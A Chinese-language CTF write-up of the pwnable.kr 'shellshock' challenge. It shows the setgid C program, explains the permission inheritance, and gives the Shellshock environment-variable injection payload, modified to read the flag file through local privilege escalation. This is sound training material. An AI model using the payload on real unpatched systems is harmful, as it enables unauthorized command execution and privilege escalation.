pwnable.kr shellshock

Posted 2020-09-26 p4nda

 

 

pwnable从入门到放弃，第五题。

ssh shellshock@pwnable.kr -p2222 (pw:guest)

这题主要涉及了一个关于bash的CVE漏洞。

首先还是下载源代码审计一下，shellshock.c

#include <stdio.h>
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c \'echo shock_me\'");
    return 0;
}

首先是一个关于可执行程序权限的问题，就是关于uid和gid的。

先看一下各个文件的权限

首先启动时，用户是shellshock权限，也就是other权限，这样的话对flag还是不可读的。linux开关机熟练选手根本就没懂啥意思。

后来发现shellshock这个可执行文件对group是具有特殊权限w的，这就意味着egid是属于shellshock_pwn的，这个权限很高，对flag文件是可读的，这也就涉及到了linux可执行文件权限继承和赋予问题。

我查阅了一下《C和C++安全编码》书中讲权限部分的，这相当于设置了egid，因此在代码中setreuid中设置的各uid均是预置的高权限，即egid——shellshock_pwn，因此这个可执行文件在执行到system一行时，就已经是具有shellshock_pwn组权限的程序了。

bash也是用这个组权限在打开，所以对flag是可读的。

 

解决了权限问题，就可以考虑如何代码执行了，这个破壳漏洞是可以作为一个本地提权漏洞使用，参考金山毒霸在freebuf上的漏洞分析贴，：http://www.freebuf.com/articles/system/45390.html

可以使用上面提到了poc，

env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test" 

可验证这个漏洞在./bash上是存在的：

 

将echo v...\' 换成想执行的命令 bash -c "cat ./flag"\'

而./ bash -c "echo this is a test" 换成./shellshock

 

 

偷个懒，破壳漏洞明天再看。